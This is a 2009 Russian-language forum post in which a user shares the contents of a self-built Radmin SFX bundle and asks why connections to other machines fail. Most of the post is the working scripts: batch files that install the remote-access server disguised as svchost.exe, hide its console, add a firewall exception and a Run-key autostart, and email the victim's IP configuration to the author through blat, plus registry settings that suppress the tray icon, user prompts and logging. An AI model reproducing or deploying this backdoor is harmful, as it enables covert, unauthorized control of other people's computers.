|
Познающий
Регистрация: 10.12.2008
Сообщений: 35
С нами:
9168133
Репутация:
17
|
|
едит. не знаю почему, слеши не отображаются (кое-где). на самом деле они там есть.
привет, онтечад.
сделал свою сборку радмина. тестил на себе, пашет (дада, можно подключаться к себе хД) на других нет (пока тестил на двух). может всё же что-то у меня со сборкой? содержимое sfx архива: 111.bat
111.reg
run.bat
admdll.dll
raddrv.dll
svchost.exe
_
blat.exe |
blat.dll ---- файлы консольного мейл клиента
blat.lib _|
hidcon.exe - прекрасная вещичка, которая ПОЛНОСТЬЮ скрывает выполнение батника (синтаксис очень простой: hidcon.exe [имя_батника].bat)
содержимое файла 111.bat:
PHP код:
blat.exe -install -server smtp.yandex.ru -port 587 -f моё_мыло@yandex.ru -u мой_логин -pw мой_пароль
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
reg import 111.reg regedit /s 111.reg "%SYSTEMROOT%/svchost.exe" /install /silence
hidcon.exe run.bat
содержимое run.bat:
PHP код:
ipconfig >> C:\WINDOWS\system32\ip.txt
netsh firewall add allowedprogram "%SYSTEMROOT%\svchost.exe" "SVCHOST" ENABLE
"%SYSTEMROOT%\svchost.exe" /start
blat.exe C:\\WINDOWS\system32\ip.txt -to моё_мыло2@yandex.ru
erase C:\\WINDOWS\\system32\\ip.txt
exit
содержимое 111.reg
PHP код:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin]
[HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0]
[HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server]
[HKEY_LOCAL_MACHINE\\SYSTEM\RAdmin\v2.0\\Server\\iplist]
[HKEY_LOCAL_MACHINE\\SYSTEM\RAdmin\\v2.0\\Server\\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce,1a
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
[HKEY_LOCAL_MACHINE\\SOFTWARE\\RAdmin\\v1.01\\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4,b9,49,c8,49,00,1c,eb,\
18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74,94,4f,49,42,46,f7,ab,05,\
1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28
[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows \CurrentVersion\\Run]
"svchost"="C:\\WINDOWS\\hidcon.exe run.bat"
меня уже достал этот секас...что не так??? у меня всё пашет вроде, айпи норм присылается от других, а вот коннекта нет...
Последний раз редактировалось PenSpinner; 29.01.2009 в 00:02..
|